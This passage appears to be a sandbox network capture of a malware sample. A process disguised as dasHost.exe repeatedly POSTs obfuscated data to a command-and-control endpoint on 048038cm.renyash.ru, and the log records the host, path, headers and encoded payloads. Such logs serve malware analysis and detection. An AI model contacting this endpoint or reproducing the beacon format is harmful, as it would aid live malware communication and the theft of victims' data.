                                                                        Dec 28, 2024 20:44:00.105099916 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:00.454277039 CET | 2584 | OUT | Data Raw: 53 50 59 56 56 41 55 5f 5d 5f 52 56 5a 5e 58 5c 57 59 5f 51 54 54 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYVVAU_]_RVZ^X\WY_QTTU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_<<9]!];#%,^/] 4>9*=07*3),/Y9*#5?=%\ ![(?
                                                                        Dec 28, 2024 20:44:01.287153006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:01.540999889 CET | 810 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Go%2FnTB15xiLThy0Wy9Aa%2B3hszhDL%2BjnLHnz2caIk0iZnhV0rHLFqicuhKMuKy8fiepbxqqrVpcD8E4t0UEQwD4lrCEBJgCU88kJZaM4vWdWK%2FAqfShRu%2F0WVruDki42ec1z9p1%2Bt"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ae70e214277-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4340&min_rtt=2085&rtt_var=5292&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=72535&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        47 | 192.168.2.4 | 49906 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:02.023562908 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:02.376167059 CET | 2584 | OUT | Data Raw: 53 55 5c 52 56 45 50 59 5d 5f 52 56 5a 5c 58 5b 57 58 5f 5d 54 57 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SU\RVEPY]_RVZ\X[WX_]TWU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(!Z!;(Y %88,7X:X)? 90>8:?Z!#3Z=%\ ![(7
                                                                        Dec 28, 2024 20:44:03.117609024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:03.356231928 CET | 810 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EnkQghipJb%2F1GBP6i9QqGyyQH0wSh%2FoYvnQCAqGQCZXFsxiZkI22xzp%2FoBvdhal%2FYnGxMmAObjSLPMVlGa43QF23PZTyBy3ttXd8WahW90PMO7BrFXpkgL6eMi5%2FQRSmZdQb%2B8fk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940af28eb032ee-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=5376&min_rtt=2746&rtt_var=6291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=61367&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        48 | 192.168.2.4 | 49911 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:03.647574902 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:04.001158953 CET | 2584 | OUT | Data Raw: 56 53 59 56 53 46 50 5c 5d 5f 52 56 5a 5b 58 5b 57 5f 5f 5a 54 57 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSYVSFP\]_RVZ[X[W__ZTWUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(,1]!$Z#6$-;#\!>>- V*Y/[99 # ),%\ ![(+
                                                                        Dec 28, 2024 20:44:04.736143112 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:04.979186058 CET | 813 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVm6SBK1bF8ttL7%2FTL%2Fi9ZA1Tk8J%2BZika%2BvXiaT5L%2Bd%2F57WTmUaQLo5T5jeBBd33pZvi7KqOAALWAuQ6YLbDMdpi6y1ssKCcK%2BkfXiuwwN0cJ8txenUttSVDNn5vAHqcKJPPceIH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940afca9144376-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3301&min_rtt=1715&rtt_var=3816&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=101339&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        49 | 192.168.2.4 | 49917 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:05.425996065 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:05.782461882 CET | 2584 | OUT | Data Raw: 53 56 59 53 53 42 55 59 5d 5f 52 56 5a 5a 58 5f 57 50 5f 5a 54 50 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SVYSSBUY]_RVZZX_WP_ZTPU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^+/=]!($7& 8(<#=1)=07)7)/<,9+X# ]*%\ ![(/
                                                                        Dec 28, 2024 20:44:06.632666111 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:06.758754015 CET | 802 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBEop6p0EeLujw1INkP2fsvK%2BvD9iEr2wRERsGGUzc%2FkWxP8x3J44MF2SMVZzj1SW4aOZgPOXMFxJuHP2HEocHU5Pp7Ekc1fqZvPNw5iS3LPNkgRTa5w6g5KCYl0duHlPgGbCqbx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b07cae06a56-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3943&min_rtt=1694&rtt_var=5134&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=74145&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        50 | 192.168.2.4 | 49922 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:06.994298935 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:07.344861031 CET | 2584 | OUT | Data Raw: 56 5b 59 52 56 43 50 5c 5d 5f 52 56 5a 5b 58 58 57 5a 5f 5a 54 52 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YRVCP\]_RVZ[XXWZ_ZTRUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX')<6 ^75 X/83]7>=*, 9?* ._;60 (<%\ ![(+
                                                                        Dec 28, 2024 20:44:08.084136009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:08.327881098 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fnknY20REX3V6hy1YXCENhLjHEHYx8WDnx8r4%2F59m6GROi8ie4ENRVTOh%2FZIg2ottCpQgenAEEm4CjCzQ0nujOmSs8bQqiXTrhqR7rK4scdDY8Q3fJCwG8Wq21qGkG%2Bu79AQSSmU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b119ce0de9a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4530&min_rtt=1490&rtt_var=6640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=56554&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        51 | 192.168.2.4 | 49925 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:08.576657057 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:08.923166037 CET | 2584 | OUT | Data Raw: 53 55 59 54 53 42 50 5e 5d 5f 52 56 5a 5b 58 54 57 5e 5f 59 54 5d 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYTSBP^]_RVZ[XTW^_YT]UBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z?!\ +(_ S4/84!.2Y*=##9V)<;:460>%\ ![(+
                                                                        Dec 28, 2024 20:44:09.707803011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:10.006495953 CET | 803 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3C4OToaIQKaEkbgLT%2F9xJSIngW4yVhQbCWXYEitM9dMpUQg3ZX4dwGCge5w5wBZyjxGxTV6Ht6b6AzZd1mxSC5i2A3eTwxEjzm0GkduNbzbZZu0Y8IlHCd4Z9RjB97D%2FF3LO9ub"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b1bbb8541e6-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2924&min_rtt=1681&rtt_var=3118&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=125515&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        52 | 192.168.2.4 | 49930 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:10.243397951 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:10.594959021 CET | 2584 | OUT | Data Raw: 53 52 5c 51 56 47 50 5a 5d 5f 52 56 5a 50 58 59 57 5f 5f 50 54 50 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SR\QVGPZ]_RVZPXYW__PTPUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<-Z"/ S?; 4.X>=("9+>;X9! =,%\ ![(
                                                                        Dec 28, 2024 20:44:11.328167915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:11.569171906 CET | 802 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6xElAsqAqEaNYggwoNc0EYCOqAPzTIuBnIUTmKONSPz%2Bxx1JwQlumdRwx7izTQQ%2BsR4bjpxvostV3bU5AWXqPILEDPrOqXHD8xAecSl8QYCDbJ59nWOMEUNF2ZIlWS4sjXsxSIz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b25d9847287-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3784&min_rtt=1956&rtt_var=4391&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=88026&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        53 | 192.168.2.4 | 49936 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:11.805520058 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:12.157326937 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:12.157403946 CET | 2584 | OUT | Data Raw: 56 56 59 51 53 46 50 52 5d 5f 52 56 5a 59 58 5a 57 50 5f 51 54 56 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VVYQSFPR]_RVZYXZWP_QTVUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_+?9\! [758Z88?#._>'P70>3:Z!0,=<%\ ![(#
                                                                        Dec 28, 2024 20:44:13.284667015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:13.520597935 CET | 803 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZDerwNgjPotjl9AcFXmGuu4eFB3YAVln1aCg8Vtm1kDl%2FSD1CYSoXQ0ylelr1mMOsd0pUq1MjKrRcvEEnVIb8r4zkqv%2BQg9MsjlXP1Y3BYMQRPRGklPYYGKgWC0915rbgF8NTcm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b321caac413-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2979&min_rtt=1574&rtt_var=3401&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=113902&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        54 | 192.168.2.4 | 49941 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:13.757625103 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:14.110605955 CET | 2584 | OUT | Data Raw: 56 54 5c 54 53 41 55 5b 5d 5f 52 56 5a 5c 58 54 57 5c 5f 5f 54 56 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VT\TSAU[]_RVZ\XTW\__TVUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+)6 #&8[-;#4>!>-T49?T(,/Z9?]!00><%\ ![(7
                                                                        Dec 28, 2024 20:44:14.889739990 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:15.131808043 CET | 809 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2vMyTMBsXQD6oZO0RoPI5%2Fm630%2B1DD92WcyV3LDB5%2BhpRm98NW9M8En3M92a41TA4zRS6Exb8oq93nnymHnpH04xBh0kgw22HK7apn2J0E5H%2Fa0NsZA3h2nWfP33E8F%2B8PgE08E"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b3c0a2e6a56-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=2345&rtt_var=3194&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=125818&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        55 | 192.168.2.4 | 49944 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:15.369741917 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:15.719861984 CET | 2584 | OUT | Data Raw: 56 50 59 56 56 43 50 5a 5d 5f 52 56 5a 5f 58 59 57 5d 5f 50 54 5c 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYVVCPZ]_RVZ_XYW]_PT\UHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y([!8X"68,+7X&*./#*#W(/?^:'[# $(,%\ ![(
                                                                        Dec 28, 2024 20:44:16.651869059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:16.896053076 CET | 800 | IN | HTTP/1.1 200 OK
